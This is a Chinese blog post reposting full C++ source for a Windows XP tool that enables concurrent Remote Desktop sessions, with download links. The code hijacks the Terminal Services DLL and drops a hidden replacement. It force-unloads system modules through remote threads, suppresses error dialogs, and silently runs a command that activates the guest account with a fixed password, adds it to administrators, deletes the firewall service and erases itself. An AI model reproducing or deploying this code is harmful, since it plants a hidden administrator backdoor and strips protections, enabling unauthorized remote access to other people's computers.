首页 > 工具收集 > xp下双开3389源码

xp下双开3389源码

2008年5月26日 发表评论 阅读评论

作者:cooldiyer
来源:红狼

很早时候写的,方便大家用,代码丢了我也可以百度到
编译后,直接运行,XP的终端自动开启激活guest,密码为cooldiyer,加管理员组
并且可以多用户登录
声明,原创………………..
代码:

<br />// xp3389.cpp : XP下双开3389的工具 Code By CoolDiyer<br />//<br />#pragma comment(linker, "/FILEALIGN:0x200 /opt:nowin98 /IGNORE:4078 /MERGE:.rdata=.text /MERGE:.data=.text /section:.text,ERW")<br />#include "stdafx.h"<br />#include "resource.h"<br />#include <br />#include <br />DWORD<br />GetProcessId(LPCTSTR szProcName)<br />{<br />PROCESSENTRY32 pe;<br />DWORD dwPid;<br />DWORD dwRet;<br />BOOL bFound = FALSE;<br /><br />HANDLE hSP = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);<br />if (hSP)<br />{<br />  pe.dwSize = sizeof( pe );<br /><br />  for (dwRet = Process32First(hSP, &pe);<br />  dwRet;<br />  dwRet = Process32Next(hSP, &pe))<br />  {<br />   if (lstrcmpi( szProcName, pe.szExeFile) == 0)<br />   {<br />    dwPid = pe.th32ProcessID;<br />    bFound = TRUE;<br />    break;<br />   }<br />  }<br />  CloseHandle(hSP);<br /><br />  if (bFound == TRUE)<br />  {<br />   return dwPid;<br />  }<br />}<br />return NULL;<br />}<br /><br />bool CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam)<br />{<br />if (!IsWindowVisible(hwnd))<br />  return true;<br /><br />DWORD dwWindowThreadId = NULL;<br />DWORD  dwLsassId = (DWORD)lParam;<br />GetWindowThreadProcessId(hwnd, &dwWindowThreadId);<br />if (dwWindowThreadId == (DWORD)lParam)<br />{<br />  // 关闭指定进程的窗口<br />  SendMessage(hwnd, WM_CLOSE, 0, 0);<br />}<br />return true;<br />}<br />// 写注册表的指定键的数据(Mode:0-新建键数据 1-设置键数据 2-删除指定键 3-删除指定键项) from NameLess114<br />int WriteRegEx(HKEY MainKey, LPCTSTR SubKey, LPCTSTR Vname, DWORD Type, char* szData, DWORD dwData, int Mode)<br />{<br />HKEY  hKey;<br />DWORD dwDisposition;<br />int   iResult =0;<br /><br />__try<br />{<br />  // SetKeySecurityEx(MainKey,Subkey,KEY_ALL_ACCESS);<br />  switch(Mode)<br />  {<br />  case 0:<br />   if(RegCreateKeyEx(MainKey,SubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,&dwDisposition) != ERROR_SUCCESS)<br />    __leave;<br />  case 1:<br />   if(RegOpenKeyEx(MainKey,SubKey,0,KEY_READ&#124;KEY_WRITE,&hKey) != ERROR_SUCCESS)<br />    __leave;<br />   switch(Type)<br />   {<br />   case REG_SZ:<br />   case REG_EXPAND_SZ:<br />    if(RegSetValueEx(hKey,Vname,0,Type,(LPBYTE)szData,strlen(szData)+1) == ERROR_SUCCESS)<br />     iResult =1;<br />    break;<br />   case REG_DWORD:<br />                if(RegSetValueEx(hKey,Vname,0,Type,(LPBYTE)&dwData,sizeof(DWORD)) == ERROR_SUCCESS)<br />     iResult =1;<br />    break;<br />   case REG_BINARY:<br />    break;<br />   }<br />   break;<br />   case 2:<br />    if(RegOpenKeyEx(MainKey,SubKey,NULL,KEY_READ&#124;KEY_WRITE,&hKey) != ERROR_SUCCESS)<br />     __leave;<br />    if (RegDeleteKey(hKey,Vname) == ERROR_SUCCESS)<br />     iResult =1;<br />    break;<br />   case 3:<br />    if(RegOpenKeyEx(MainKey,SubKey,NULL,KEY_READ&#124;KEY_WRITE,&hKey) != ERROR_SUCCESS)<br />     __leave;<br />    if (RegDeleteValue(hKey,Vname) == ERROR_SUCCESS)<br />     iResult =1;<br />    break;<br />  }<br />}<br />__finally<br />{<br />  RegCloseKey(MainKey);<br />  RegCloseKey(hKey);<br />}<br />return iResult;<br />}<br />bool DebugPrivilege(const char *PName, BOOL bEnable)<br />{<br />BOOL              bResult = TRUE;<br />HANDLE            hToken;<br />TOKEN_PRIVILEGES  TokenPrivileges;<br /><br />if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY &#124; TOKEN_ADJUST_PRIVILEGES, &hToken))<br />{<br />  bResult = FALSE;<br />  return bResult;<br />}<br />TokenPrivileges.PrivilegeCount = 1;<br />TokenPrivileges.Privileges&#91;0&#93;.Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;<br /><br />LookupPrivilegeValue(NULL, PName, &TokenPrivileges.Privileges&#91;0&#93;.Luid);<br />AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL);<br />    if (GetLastError() != ERROR_SUCCESS)<br />{<br />  bResult = FALSE;<br />}<br /><br />CloseHandle(hToken);<br />return bResult;<br />}<br />bool UnloadRemoteModule(DWORD dwProcessID, HANDLE hModuleHandle)<br />{<br />HANDLE hRemoteThread;<br />HANDLE hProcess;<br /><br />if (hModuleHandle == NULL)<br />  return false;<br />hProcess=::OpenProcess(PROCESS_VM_WRITE&#124;PROCESS_CREATE_THREAD&#124;PROCESS_VM_OPERATION, FALSE, dwProcessID);<br />if (hProcess == NULL)<br />  return false;<br /><br />HMODULE hModule=::GetModuleHandle(”kernel32.dll”);<br />LPTHREAD_START_ROUTINE pfnStartRoutine = (LPTHREAD_START_ROUTINE)::GetProcAddress(hModule, “FreeLibrary”);<br />hRemoteThread=::CreateRemoteThread(hProcess, NULL, 0, pfnStartRoutine, hModuleHandle, 0, NULL);<br /><br />if(hRemoteThread==NULL)<br />{<br />  ::CloseHandle(hProcess);<br />  return false;<br />}<br />::WaitForSingleObject(hRemoteThread,INFINITE);<br />::CloseHandle(hProcess);<br />::CloseHandle(hRemoteThread);<br />return true;<br />}<br />HANDLE FindModule(DWORD dwProcessID, LPCTSTR lpModulePath)<br />{<br />HANDLE hModuleHandle = NULL;<br />MODULEENTRY32 me32={0};<br />HANDLE hModuleSnap=::CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessID);<br />me32.dwSize=sizeof(MODULEENTRY32);<br />if(::Module32First(hModuleSnap, &me32))<br />{<br />  do<br />  {<br />   if (!lstrcmpi(me32.szExePath, lpModulePath))<br />   {<br />    hModuleHandle = me32.hModule;<br />    break;<br />   }<br />  }while(::Module32Next(hModuleSnap,&me32));<br />}<br />::CloseHandle(hModuleSnap);<br />return hModuleHandle;<br />}<br />bool UnloadModule(LPCTSTR lpModulePath)<br />{<br />BOOL bRet = false;<br />PROCESSENTRY32 pe32;<br />pe32.dwSize = sizeof(pe32);<br /><br />HANDLE hProcessSnap=::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);<br /><br />//查找相关的进程<br />if(::Process32First(hProcessSnap, &pe32))<br />{<br />  do<br />  {<br />   HANDLE hModuleHandle = FindModule(pe32.th32ProcessID, lpModulePath);<br />   if (hModuleHandle != NULL)<br />   {<br />    bRet = UnloadRemoteModule(pe32.th32ProcessID, hModuleHandle);<br />   }<br />  }while (Process32Next(hProcessSnap,&pe32));<br />}<br />CloseHandle(hProcessSnap);<br />return bRet;<br />}<br />void StartService(LPCTSTR lpService)<br />{<br />SC_HANDLE hSCManager = OpenSCManager( NULL, NULL,SC_MANAGER_CREATE_SERVICE );<br />if ( NULL != hSCManager )<br />{<br />  SC_HANDLE hService = OpenService(hSCManager, lpService, DELETE &#124; SERVICE_START);<br />  if ( NULL != hService )<br />  {<br />   StartService(hService, 0, NULL);<br />   CloseServiceHandle( hService );<br />  }<br />  CloseServiceHandle( hSCManager );<br />}<br />}<br />BOOL ReleaseResource(WORD wResourceID, LPCTSTR lpType, LPCTSTR lpFileName)<br />{<br />HGLOBAL hRes;<br />HRSRC hResInfo;<br />HANDLE hFile;<br />DWORD dwBytes;<br /><br />hResInfo = FindResource(NULL, MAKEINTRESOURCE(wResourceID), lpType);<br />if (hResInfo == NULL)<br />  return FALSE;<br />hRes = LoadResource(NULL, hResInfo);<br />if (hRes == NULL)<br />  return FALSE;<br />hFile = CreateFile<br />  (<br />  lpFileName,<br />  GENERIC_WRITE,<br />  FILE_SHARE_WRITE,<br />  NULL,<br />  CREATE_ALWAYS,<br />  FILE_ATTRIBUTE_NORMAL,<br />  NULL<br />  );<br />if (hFile == NULL)<br />  return FALSE;<br />WriteFile(hFile, hRes, SizeofResource(NULL, hResInfo), &dwBytes, NULL);<br />CloseHandle(hFile);<br /><br />return TRUE;<br />}<br />void SetReg()<br />{<br />WriteRegEx(HKEY_LOCAL_MACHINE, “SYSTEM&#92;&#92;CurrentControlSet&#92;&#92;Services&#92;&#92;TermService”,”Start”,REG_DWORD,NULL,2,0);<br />WriteRegEx(HKEY_LOCAL_MACHINE, “SOFTWARE&#92;&#92;Microsoft&#92;&#92;Windows NT&#92;&#92;CurrentVersion&#92;&#92;Winlogon”, “KeepRASConnections”, REG_SZ, “1″, 0, 0);<br />WriteRegEx(HKEY_LOCAL_MACHINE, “SYSTEM&#92;&#92;CurrentControlSet&#92;&#92;Control&#92;&#92;Terminal Server”, “fDenyTSConnections”, REG_DWORD, NULL, 0, 0);<br />WriteRegEx(HKEY_LOCAL_MACHINE, “SYSTEM&#92;&#92;CurrentControlSet&#92;&#92;Control&#92;&#92;Terminal Server&#92;&#92;Licensing Core”, “EnableConcurrentSessions”,<br />  REG_DWORD, NULL, 1, 0);<br />WriteRegEx(HKEY_LOCAL_MACHINE, “SYSTEM&#92;&#92;CurrentControlSet&#92;&#92;Services&#92;&#92;TermService&#92;&#92;Parameters”, “ServiceDll”, REG_EXPAND_SZ,<br />  “%SystemRoot%&#92;&#92;system32&#92;&#92;termsrvhack.dll”, 0, 0);<br />}<br />void ReleaseDll()<br />{<br />char strSystemPath&#91;MAX_PATH&#93;;<br />char strDllcachePath&#91;MAX_PATH&#93;;<br />GetSystemDirectory(strSystemPath, sizeof(strSystemPath));<br />GetSystemDirectory(strDllcachePath, sizeof(strDllcachePath));<br />lstrcat(strSystemPath, “&#92;&#92;termsrvhack.dll”);<br />lstrcat(strDllcachePath, “&#92;&#92;dllcache&#92;&#92;termsrvhack.dll”);<br />ReleaseResource(IDR_DLL, “BIN”, strSystemPath);<br />ReleaseResource(IDR_DLL, “BIN”, strDllcachePath);<br />SetFileAttributes(strSystemPath, FILE_ATTRIBUTE_HIDDEN &#124; FILE_ATTRIBUTE_READONLY &#124; FILE_ATTRIBUTE_SYSTEM);<br />SetFileAttributes(strDllcachePath, FILE_ATTRIBUTE_HIDDEN &#124; FILE_ATTRIBUTE_READONLY &#124; FILE_ATTRIBUTE_SYSTEM);<br />}<br />bool IsOSXP()<br />{<br />OSVERSIONINFOEX OsVerInfoEx;<br />OsVerInfoEx.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);<br />GetVersionEx((OSVERSIONINFO *)&OsVerInfoEx); // 注意转换类型<br />return OsVerInfoEx.dwMajorVersion == 5 && OsVerInfoEx.dwMinorVersion == 1;<br />}<br />void HijackService()<br />{<br />char strDll&#91;MAX_PATH&#93;;<br />GetSystemDirectory(strDll, sizeof(strDll));<br />lstrcat(strDll, “&#92;&#92;termsrv.dll”);<br />// 释放termsrvhack.dll<br />ReleaseDll();<br /><br />// 遍历进程卸载现在加载的DLL<br />DebugPrivilege(SE_DEBUG_NAME, TRUE);<br />if (!UnloadModule(strDll))<br />  return;<br />DebugPrivilege(SE_DEBUG_NAME, FALSE);<br /><br />// 关闭要弹出的出错对话框和因DLL强制卸载使一些服务异常终止而弹出来的自动关机对话框<br />// 对进程赋予关闭权限<br />DebugPrivilege(SE_SHUTDOWN_NAME,TRUE);<br />DWORD dwLsassId = GetProcessId(”csrss.exe”);<br />while (!AbortSystemShutdown(NULL))<br />{<br />  // 一些系统是会弹出drwtsn32.exe<br />  DWORD dwDrwtsn32Id = GetProcessId(”drwtsn32.exe”);<br />  if (dwDrwtsn32Id != NULL)<br />  {<br />   EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)dwDrwtsn32Id);<br />  }<br />  // 模块强制卸载时会出错,关闭csrss.exe进程弹出的出错窗口<br />  EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)dwLsassId);<br />  Sleep(10);<br />}<br />DebugPrivilege(SE_SHUTDOWN_NAME, FALSE);<br />}<br />int WINAPI WinMain(<br />       HINSTANCE hInstance,      // handle to current instance<br />       HINSTANCE hPrevInstance,  // handle to previous instance<br />       LPSTR lpCmdLine,          // command line<br />       int nCmdShow              // show state<br />       )<br />{<br />// 一些注册表的操作<br />SetReg();<br />if (IsOSXP())<br />{<br />  // 替换DLL<br />  HijackService();<br />}<br />// 开始终端服务<br />StartService(”TermService”);<br />// 激活guest,加管理员组,自删除,停止XP自带的防火墙,并删除它<br />char strCommand&#91;1024&#93;;<br />char strSelf&#91;MAX_PATH&#93;;<br />GetModuleFileName(NULL, strSelf, sizeof(strSelf));<br />wsprintf(strCommand, “cmd.exe /c net user guest /active:yes && net user guest cooldiyer && net localgroup administrators guest /add && net stop SharedAccess /y && del &#92;”%s&#92;” && sc delete SharedAccess”, strSelf);<br />WinExec(strCommand, SW_HIDE);<br />return 0;<br />}

下载:bin.rar   src.rar

转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:xp下双开3389源码
本文地址:http://www.woyigui.cn/2008/05/26/Under-a-3389-double-xp-source/

分类: 工具收集 标签: , ,
  1. 本文目前尚无任何评论.
  1. 本文目前尚无任何 trackbacks 和 pingbacks.
*